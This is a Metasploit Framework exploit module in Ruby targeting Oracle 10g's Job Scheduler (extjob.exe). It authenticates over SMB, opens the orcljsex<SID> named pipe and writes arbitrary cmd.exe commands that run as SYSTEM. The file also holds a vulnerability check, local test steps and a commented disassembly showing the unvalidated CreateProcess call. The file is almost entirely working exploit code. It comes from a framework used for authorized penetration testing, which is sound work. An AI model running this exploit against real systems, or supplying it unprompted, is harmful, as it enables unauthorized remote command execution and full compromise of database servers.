## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Job Scheduler Named Pipe Command Execution', 'Description' => %q{ This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job Scheduler is implemented via the component extjob.exe which listens on a named pipe called "orcljsex<SID>" and execute arbitrary commands received throw this channel via CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required. This module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler runs as SYSTEM on Windows but it's disabled by default. }, 'Author' => [ 'David Litchfield', # Vulnerability discovery and exploit 'juan vazquez', # Metasploit module 'sinn3r' # Metasploit fu ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ], ], 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [['Automatic',{}]], 'Privileged' => true, 'DisclosureDate' => 'Jan 01 2007', 'DefaultTarget' => 0)) register_options( [ OptString.new('SID', [ true, 'The database sid', 'ORCL']) ], self.class) end def exploit print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...") execute_cmdstager({:linemax => 1500}) handler end def execute_command(cmd, opts) connect() smb_login() pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}") pipe.write("cmd.exe /q /c #{cmd}") pipe.close disconnect end def check begin connect() smb_login() pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}") pipe.write("cmd.exe /q /c dir") result = pipe.read() # Exit Code pipe.close disconnect rescue return Exploit::CheckCode::Safe end if result == "1" # Exit Code should be 1 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end end =begin How To Test locally: 1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and then Start the service. 2. Make sure you know your SMBUser and SMBPass 3. Run: C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl Code Analysis of extjob.exe (Oracle 10g Release 1) ================================================= From _ServiceStart(): * Create Named Pipe and store handle on "esi": .text:004017EC push offset _pipename .text:004017F1 lea ecx, [ebp+Name] .text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s" .text:004017FC push ecx .text:004017FD jmp short loc_401810 .text:004017FF ; --------------------------------------------------------------------------- .text:004017FF .text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj .text:004017FF push offset $SG59613 .text:00401804 lea edx, [ebp+Name] .text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s" .text:0040180F push edx ; Dest .text:00401810 .text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj .text:00401810 call ds:__imp__sprintf .text:00401816 add esp, 0Ch .text:00401819 push edi .text:0040181A push edi .text:0040181B push 4 .text:0040181D call _ReportStatusToSCMgr .text:00401822 add esp, 0Ch .text:00401825 test eax, eax .text:00401827 jz loc_4018EC .text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x) .text:0040185C mov esi, eax * Connect Named Pipe .text:0040188F push eax ; lpOverlapped .text:00401890 push esi ; hNamedPipe .text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x) * Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter .text:004018B9 lea edx, [ebp+ThreadId] .text:004018BC push edx ; lpThreadId .text:004018BD push 0 ; dwCreationFlags .text:004018BF push esi ; lpParameter .text:004018C0 push offset _ExecMain ; lpStartAddress .text:004018C5 push 0 ; dwStackSize .text:004018C7 push 0 ; lpThreadAttributes .text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x) From ExecMain(): * Stores Named Pipe Handle in ebx .text:0040197C mov ebx, [ebp+hObject] * Read From Named Pipe .text:004019C4 lea eax, [ebp+NumberOfBytesRead] .text:004019C7 push edx ; lpOverlapped .text:004019C8 push eax ; lpNumberOfBytesRead .text:004019C9 lea ecx, [ebp+Buffer] .text:004019CF push 10000h ; nNumberOfBytesToRead .text:004019D4 push ecx ; lpBuffer .text:004019D5 push ebx ; hFile .text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x) * CreateProcess with lpCommandLine full controlled by the user input .text:00401A06 mov ecx, 11h .text:00401A0B xor eax, eax .text:00401A0D lea edi, [ebp+StartupInfo] .text:00401A10 push esi .text:00401A11 rep stosd .text:00401A13 lea eax, [ebp+ProcessInformation] .text:00401A16 lea ecx, [ebp+StartupInfo] .text:00401A19 push eax ; lpProcessInformation .text:00401A1A push ecx ; lpStartupInfo .text:00401A1B push 0 ; lpCurrentDirectory .text:00401A1D push 0 ; lpEnvironment .text:00401A1F push 0 ; dwCreationFlags .text:00401A21 push 0 ; bInheritHandles .text:00401A23 push 0 ; lpThreadAttributes .text:00401A25 lea edx, [ebp+Buffer] .text:00401A2B push 0 ; lpProcessAttributes .text:00401A2D push edx ; lpCommandLine .text:00401A2E push 0 ; lpApplicationName .text:00401A30 mov [ebp+StartupInfo.cb], 44h .text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5 .text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h .text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671 .text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x) =end